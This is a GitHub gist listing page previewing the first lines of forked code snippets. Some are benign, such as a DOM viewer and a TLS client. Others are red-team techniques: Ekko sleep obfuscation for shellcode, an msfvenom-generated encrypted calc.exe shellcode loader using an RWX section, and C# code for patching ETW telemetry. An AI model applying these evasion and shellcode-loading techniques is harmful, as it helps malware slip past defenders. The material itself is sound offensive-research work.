killvxk
/ DOM3D.js
Created
March 30, 2024 09:17
— forked from OrionReed/dom3d.js
3D DOM viewer, copy-paste this into your console to visualise the DOM topographically.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // 3D Dom viewer, copy-paste this into your console to visualise the DOM as a stack of solid blocks. | |
| // You can also minify and save it as a bookmarklet (https://www.freecodecamp.org/news/what-are-bookmarklets/) | |
| (() => { | |
| const SHOW_SIDES = false; // color sides of DOM nodes? | |
| const COLOR_SURFACE = true; // color tops of DOM nodes? | |
| const COLOR_RANDOM = false; // randomise color? | |
| const COLOR_HUE = 190; // hue in HSL (https://hslpicker.com) | |
| const MAX_ROTATION = 180; // set to 360 to rotate all the way round | |
| const THICKNESS = 20; // thickness of layers | |
| const DISTANCE = 10000; // ¯\\_(ツ)_/¯ |
killvxk
/ 31_round_sha256_poc.py
Created
March 30, 2024 05:29
— forked from DavidBuchanan314/31_round_sha256_poc.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| 31-round sha256 collision. | |
| Not my research, just a PoC script I put together with numbers plugged in from the slide at | |
| https://twitter.com/jedisct1/status/1772647350554464448 from FSE2024 | |
| SHA256 impl follows FIPS 180-4 | |
| https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf | |
| """ |
killvxk
/ shitcode.c
Created
March 26, 2024 12:40
— forked from susMdT/shitcode.c
hahaha da shellcode go brrrr
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Core.h> | |
| #include <Win32.h> | |
| #include <Structs.h> | |
| #include <Sleep.h> | |
| #include <Utils.h> | |
| SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance) | |
| { |
killvxk
/ Program.cs
Created
March 26, 2024 12:40
— forked from susMdT/Program.cs
haha funny jit go brrrr
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.CompilerServices; | |
| using System.Reflection; | |
| using System.Reflection.Emit; | |
| namespace FunkyJit | |
| { | |
| class Program | |
| { | |
| public static void Nothing() { Console.WriteLine(); } | |
| static void Main(string[] args) |
killvxk
/ tlsclient.cpp
Created
February 24, 2024 09:47
— forked from odzhan/tlsclient.cpp
C++ SSPI Schannel TLS example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Compiles with Visual Studio 2008 for Windows | |
| // This C example is designed as more of a guide than a library to be plugged into an application | |
| // That module required a couple of major re-writes and is available upon request | |
| // The Basic example has tips to the direction you should take | |
| // This will work with connections on port 587 that upgrade a plain text session to an encrypted session with STARTTLS as covered here. | |
| // TLSclient.c - SSPI Schannel gmail TLS connection example | |
| #define SECURITY_WIN32 |
killvxk
/ rdp_pack.cpp
Created
February 24, 2024 09:21
— forked from odzhan/rdp_pack.cpp
Compression using RDP API
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| Compression using undocumented API in rdpbase.dll | |
| RDPCompressEx supports four algorithms : MPPC-8K, MPPC-64K, NCRUSH and XCRUSH. | |
| This code supports all except NCRUSH. | |
| The MPPC compression ratio is very similar to LZSS, so this could be quite useful for shellcode trying to evade detection. | |
| NCRUSH compression appears to work but fails for decompression. |
killvxk
/ ntdelegate.cpp
Created
February 24, 2024 09:18
— forked from odzhan/ntdelegate.cpp
Delegate NT DLL Table
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // How to locate the NT Delegate Callback Table in x86 builds of ntdll.dll | |
| // | |
| // @modexpblog | |
| // | |
| #define PHNT_VERSION PHNT_THRESHOLD | |
| #include <phnt_windows.h> | |
| #include <phnt.h> |
killvxk
/ ParentProcessValidator.cpp
Created
February 24, 2024 06:12
— forked from WKL-Sec/ParentProcessValidator.cpp
This C++ code snippet demonstrates how to verify if an executable is launched by explorer.exe to enhance security during red team operations.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # White Knight Labs - Offensive Development | |
| # Guardrails - Parent Process Check | |
| #include <windows.h> | |
| #include <tlhelp32.h> | |
| #include <psapi.h> | |
| #include <tchar.h> | |
| #include <iostream> | |
| // Function to get the ID of the parent process |
killvxk
/ byorwx.cpp
Created
November 25, 2023 06:31
— forked from dadevel/byorwx.cpp
Bring your own RWX section
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <cstdint> | |
| // x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe | |
| // msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef | |
| unsigned char buf[] = | |
| "\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32" | |
| "\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36" | |
| "\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c" | |
| "\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23" |
killvxk
/ PatchETW.cs
Created
November 20, 2023 06:41
— forked from seahop/PatchETW.cs
ETW patching in C#. Based on https://www.phrack.me/tools/2023/04/10/Patching-ETW-in-C.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| using DInvoke.DynamicInvoke; | |
| namespace PatchETW | |
| { | |
| public static class Native | |
| { |
NewerOlder